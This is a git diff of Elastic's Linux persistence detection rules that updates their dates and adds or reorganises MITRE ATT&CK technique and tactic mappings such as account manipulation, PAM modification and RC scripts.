"https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_kernel_object_file_creation.toml b/rules/linux/persistence_kernel_object_file_creation.toml index e5b8aede59e..23f7580610a 100644 --- a/rules/linux/persistence_kernel_object_file_creation.toml +++ b/rules/linux/persistence_kernel_object_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/19" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -138,6 +138,23 @@ id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.006" +name = "Kernel Modules and Extensions" +reference = "https://attack.mitre.org/techniques/T1547/006/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [rule.new_terms] field = "new_terms_fields" value = ["process.name", "file.name"] diff --git a/rules/linux/persistence_kubernetes_sensitive_file_activity.toml b/rules/linux/persistence_kubernetes_sensitive_file_activity.toml index 59a33614ada..a5c2e7e965b 100644 --- a/rules/linux/persistence_kubernetes_sensitive_file_activity.toml +++ b/rules/linux/persistence_kubernetes_sensitive_file_activity.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/05" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -111,6 +111,16 @@ file where host.os.type == "linux" and event.type != "deletion" and file.path li [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" + +[[rule.threat.technique.subtechnique]] +id = "T1053.007" +name = "Container Orchestration Job" +reference = "https://attack.mitre.org/techniques/T1053/007/" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" @@ -121,17 +131,38 @@ id = "T1543.005" name = "Container Service" reference = "https://attack.mitre.org/techniques/T1543/005/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1053" -name = "Scheduled Task/Job" -reference = "https://attack.mitre.org/techniques/T1053/" +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" [[rule.threat.technique.subtechnique]] -id = "T1053.007" -name = "Container Orchestration Job" -reference = "https://attack.mitre.org/techniques/T1053/007/" +id = "T1543.005" +name = "Container Service" +reference = "https://attack.mitre.org/techniques/T1543/005/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_kworker_file_creation.toml b/rules/linux/persistence_kworker_file_creation.toml index 428a388aa15..3d1b0170edc 100644 --- a/rules/linux/persistence_kworker_file_creation.toml +++ b/rules/linux/persistence_kworker_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/26" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -199,6 +199,16 @@ id = "T1014" name = "Rootkit" reference = "https://attack.mitre.org/techniques/T1014/" +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + +[[rule.threat.technique.subtechnique]] +id = "T1036.005" +name = "Match Legitimate Resource Name or Location" +reference = "https://attack.mitre.org/techniques/T1036/005/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" diff --git a/rules/linux/persistence_linux_backdoor_user_creation.toml b/rules/linux/persistence_linux_backdoor_user_creation.toml index fde1a2aa627..b1e668e6188 100644 --- a/rules/linux/persistence_linux_backdoor_user_creation.toml +++ b/rules/linux/persistence_linux_backdoor_user_creation.toml @@ -2,7 +2,7 @@ creation_date = "2023/03/07" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -146,6 +146,11 @@ process.args in ("-o", "--non-unique") [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique]] id = "T1136" name = "Create Account" @@ -160,3 +165,16 @@ reference = "https://attack.mitre.org/techniques/T1136/001/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_linux_group_creation.toml b/rules/linux/persistence_linux_group_creation.toml index 1a5ec523679..fc60a928539 100644 --- a/rules/linux/persistence_linux_group_creation.toml +++ b/rules/linux/persistence_linux_group_creation.toml @@ -2,7 +2,7 @@ creation_date = "2023/02/13" integration = ["system"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -119,6 +119,16 @@ iam where host.os.type == "linux" and event.type == "group" and event.type == "c [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" + [[rule.threat.technique]] id = "T1136" name = "Create Account" diff --git a/rules/linux/persistence_linux_shell_activity_via_web_server.toml b/rules/linux/persistence_linux_shell_activity_via_web_server.toml index e3267bc31b1..31e0f60e16f 100644 --- a/rules/linux/persistence_linux_shell_activity_via_web_server.toml +++ b/rules/linux/persistence_linux_shell_activity_via_web_server.toml @@ -2,7 +2,7 @@ creation_date = "2023/03/04" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -206,3 +206,16 @@ reference = "https://attack.mitre.org/techniques/T1190/" id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/persistence_linux_user_added_to_privileged_group.toml b/rules/linux/persistence_linux_user_added_to_privileged_group.toml index 10ff2785c87..f171e2760a4 100644 --- a/rules/linux/persistence_linux_user_added_to_privileged_group.toml +++ b/rules/linux/persistence_linux_user_added_to_privileged_group.toml @@ -2,7 +2,7 @@ creation_date = "2023/02/13" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -143,6 +143,16 @@ process.executable != null and process.args in ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" + [[rule.threat.technique]] id = "T1136" name = "Create Account" @@ -157,3 +167,21 @@ reference = "https://attack.mitre.org/techniques/T1136/001/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_manual_dracut_execution.toml b/rules/linux/persistence_manual_dracut_execution.toml index 0afee6bda3f..a12b34a2ed0 100644 --- a/rules/linux/persistence_manual_dracut_execution.toml +++ b/rules/linux/persistence_manual_dracut_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -143,3 +143,16 @@ reference = "https://attack.mitre.org/techniques/T1059/004/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1542" +name = "Pre-OS Boot" +reference = "https://attack.mitre.org/techniques/T1542/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_message_of_the_day_creation.toml b/rules/linux/persistence_message_of_the_day_creation.toml index 32d08cc31f9..dc73a9eff56 100644 --- a/rules/linux/persistence_message_of_the_day_creation.toml +++ b/rules/linux/persistence_message_of_the_day_creation.toml @@ -2,7 +2,7 @@ creation_date = "2023/02/28" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -183,3 +183,16 @@ reference = "https://attack.mitre.org/techniques/T1037/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_message_of_the_day_execution.toml b/rules/linux/persistence_message_of_the_day_execution.toml index 4e5c181f2dd..2d176a1d6ac 100644 --- a/rules/linux/persistence_message_of_the_day_execution.toml +++ b/rules/linux/persistence_message_of_the_day_execution.toml @@ -2,7 +2,7 @@ creation_date = "2023/02/28" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -209,3 +209,44 @@ reference = "https://attack.mitre.org/techniques/T1037/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.011" +name = "Lua" +reference = "https://attack.mitre.org/techniques/T1059/011/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_network_manager_dispatcher_persistence.toml b/rules/linux/persistence_network_manager_dispatcher_persistence.toml index 089f1d5d144..55a144cda53 100644 --- a/rules/linux/persistence_network_manager_dispatcher_persistence.toml +++ b/rules/linux/persistence_network_manager_dispatcher_persistence.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -130,6 +130,11 @@ id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" diff --git a/rules/linux/persistence_openssl_passwd_hash_generation.toml b/rules/linux/persistence_openssl_passwd_hash_generation.toml index dc7660861c7..df808750868 100644 --- a/rules/linux/persistence_openssl_passwd_hash_generation.toml +++ b/rules/linux/persistence_openssl_passwd_hash_generation.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -111,6 +111,11 @@ not process.args in ("-help", "--help", "-h") [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique]] id = "T1136" name = "Create Account" diff --git a/rules/linux/persistence_pluggable_authentication_module_creation.toml b/rules/linux/persistence_pluggable_authentication_module_creation.toml index a5bebae77f2..8de1e62712a 100644 --- a/rules/linux/persistence_pluggable_authentication_module_creation.toml +++ b/rules/linux/persistence_pluggable_authentication_module_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/06" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -123,6 +123,16 @@ id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.003" +name = "Pluggable Authentication Modules" +reference = "https://attack.mitre.org/techniques/T1556/003/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" @@ -136,6 +146,11 @@ id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1556.003" +name = "Pluggable Authentication Modules" +reference = "https://attack.mitre.org/techniques/T1556/003/" + [rule.threat.tactic] id = "TA0006" name = "Credential Access" diff --git a/rules/linux/persistence_pluggable_authentication_module_creation_in_unusual_dir.toml b/rules/linux/persistence_pluggable_authentication_module_creation_in_unusual_dir.toml index 2505889ddd7..2323b6fef5d 100644 --- a/rules/linux/persistence_pluggable_authentication_module_creation_in_unusual_dir.toml +++ b/rules/linux/persistence_pluggable_authentication_module_creation_in_unusual_dir.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/16" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -105,6 +105,16 @@ id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.003" +name = "Pluggable Authentication Modules" +reference = "https://attack.mitre.org/techniques/T1556/003/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" @@ -118,6 +128,11 @@ id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1556.003" +name = "Pluggable Authentication Modules" +reference = "https://attack.mitre.org/techniques/T1556/003/" + [rule.threat.tactic] id = "TA0006" name = "Credential Access" diff --git a/rules/linux/persistence_pluggable_authentication_module_pam_exec_backdoor_exec.toml b/rules/linux/persistence_pluggable_authentication_module_pam_exec_backdoor_exec.toml index 57331335bcc..381f170f42b 100644 --- a/rules/linux/persistence_pluggable_authentication_module_pam_exec_backdoor_exec.toml +++ b/rules/linux/persistence_pluggable_authentication_module_pam_exec_backdoor_exec.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/29" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -110,6 +110,16 @@ id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.003" +name = "Pluggable Authentication Modules" +reference = "https://attack.mitre.org/techniques/T1556/003/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" @@ -127,3 +137,16 @@ reference = "https://attack.mitre.org/techniques/T1556/" id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/persistence_pluggable_authentication_module_source_download.toml b/rules/linux/persistence_pluggable_authentication_module_source_download.toml index 458326e408c..aad0bc8bc5b 100644 --- a/rules/linux/persistence_pluggable_authentication_module_source_download.toml +++ b/rules/linux/persistence_pluggable_authentication_module_source_download.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/16" integration = ["endpoint", "crowdstrike"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -102,7 +102,25 @@ id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1556.003" +name = "Pluggable Authentication Modules" +reference = "https://attack.mitre.org/techniques/T1556/003/" + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/persistence_polkit_policy_creation.toml b/rules/linux/persistence_polkit_policy_creation.toml index 0735fde6ca8..a80b58af304 100644 --- a/rules/linux/persistence_polkit_policy_creation.toml +++ b/rules/linux/persistence_polkit_policy_creation.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -114,6 +114,11 @@ id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" @@ -131,3 +136,16 @@ reference = "https://attack.mitre.org/techniques/T1556/" id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_potential_persistence_script_executable_bit_set.toml b/rules/linux/persistence_potential_persistence_script_executable_bit_set.toml index ada832ab5a8..f8a376964ac 100644 --- a/rules/linux/persistence_potential_persistence_script_executable_bit_set.toml +++ b/rules/linux/persistence_potential_persistence_script_executable_bit_set.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/03" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -145,6 +145,16 @@ id = "T1053.003" name = "Cron" reference = "https://attack.mitre.org/techniques/T1053/003/" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.017" +name = "Udev Rules" +reference = "https://attack.mitre.org/techniques/T1546/017/" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" @@ -159,3 +169,21 @@ reference = "https://attack.mitre.org/techniques/T1547/013/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1222" +name = "File and Directory Permissions Modification" +reference = "https://attack.mitre.org/techniques/T1222/" + +[[rule.threat.technique.subtechnique]] +id = "T1222.002" +name = "Linux and Mac File and Directory Permissions Modification" +reference = "https://attack.mitre.org/techniques/T1222/002/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_process_capability_set_via_setcap.toml b/rules/linux/persistence_process_capability_set_via_setcap.toml index 412be59834c..1f659ab84ca 100644 --- a/rules/linux/persistence_process_capability_set_via_setcap.toml +++ b/rules/linux/persistence_process_capability_set_via_setcap.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/03" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -118,7 +118,25 @@ reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_pth_file_creation.toml b/rules/linux/persistence_pth_file_creation.toml index 8492cf01914..21e54dfa5cb 100644 --- a/rules/linux/persistence_pth_file_creation.toml +++ b/rules/linux/persistence_pth_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/26" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -162,6 +162,11 @@ id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" + [rule.threat.tactic] id = "TA0002" name = "Execution" @@ -174,3 +179,21 @@ framework = "MITRE ATT&CK" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.018" +name = "Python Startup Hooks" +reference = "https://attack.mitre.org/techniques/T1546/018/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_rc_local_error_via_syslog.toml b/rules/linux/persistence_rc_local_error_via_syslog.toml index 22cdd76e5c8..a40049fd64c 100644 --- a/rules/linux/persistence_rc_local_error_via_syslog.toml +++ b/rules/linux/persistence_rc_local_error_via_syslog.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/21" integration = ["system"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -112,3 +112,21 @@ reference = "https://attack.mitre.org/techniques/T1037/004/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" + +[[rule.threat.technique.subtechnique]] +id = "T1037.004" +name = "RC Scripts" +reference = "https://attack.mitre.org/techniques/T1037/004/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_rc_local_service_already_running.toml b/rules/linux/persistence_rc_local_service_already_running.toml index c1a07ece724..3b6c833d850 100644 --- a/rules/linux/persistence_rc_local_service_already_running.toml +++ b/rules/linux/persistence_rc_local_service_already_running.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/21" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -119,3 +119,21 @@ reference = "https://attack.mitre.org/techniques/T1037/004/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" + +[[rule.threat.technique.subtechnique]] +id = "T1037.004" +name = "RC Scripts" +reference = "https://attack.mitre.org/techniques/T1037/004/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_rc_script_creation.toml b/rules/linux/persistence_rc_script_creation.toml index 1ae06027c94..a8625182815 100644 --- a/rules/linux/persistence_rc_script_creation.toml +++ b/rules/linux/persistence_rc_script_creation.toml @@ -2,7 +2,7 @@ creation_date = "2023/02/28" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -183,3 +183,21 @@ reference = "https://attack.mitre.org/techniques/T1037/004/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" + +[[rule.threat.technique.subtechnique]] +id = "T1037.004" +name = "RC Scripts" +reference = "https://attack.mitre.org/techniques/T1037/004/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_setuid_setgid_capability_set.toml b/rules/linux/persistence_setuid_setgid_capability_set.toml index 7dccbc4c3f0..253e96e34ee 100644 --- a/rules/linux/persistence_setuid_setgid_capability_set.toml +++ b/rules/linux/persistence_setuid_setgid_capability_set.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/05" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -182,3 +182,21 @@ reference = "https://attack.mitre.org/techniques/T1548/001/" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.001" +name = "Setuid and Setgid" +reference = "https://attack.mitre.org/techniques/T1548/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_shadow_file_modification.toml b/rules/linux/persistence_shadow_file_modification.toml index 61af8e00f9c..e488d7b6bb4 100644 --- a/rules/linux/persistence_shadow_file_modification.toml +++ b/rules/linux/persistence_shadow_file_modification.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/05" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -116,6 +116,16 @@ id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique]] +id = "T1136" +name = "Create Account" +reference = "https://attack.mitre.org/techniques/T1136/" + +[[rule.threat.technique.subtechnique]] +id = "T1136.001" +name = "Local Account" +reference = "https://attack.mitre.org/techniques/T1136/001/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/linux/persistence_shared_object_creation.toml b/rules/linux/persistence_shared_object_creation.toml index da1bfc93904..372e352f546 100644 --- a/rules/linux/persistence_shared_object_creation.toml +++ b/rules/linux/persistence_shared_object_creation.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/09" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [transform] 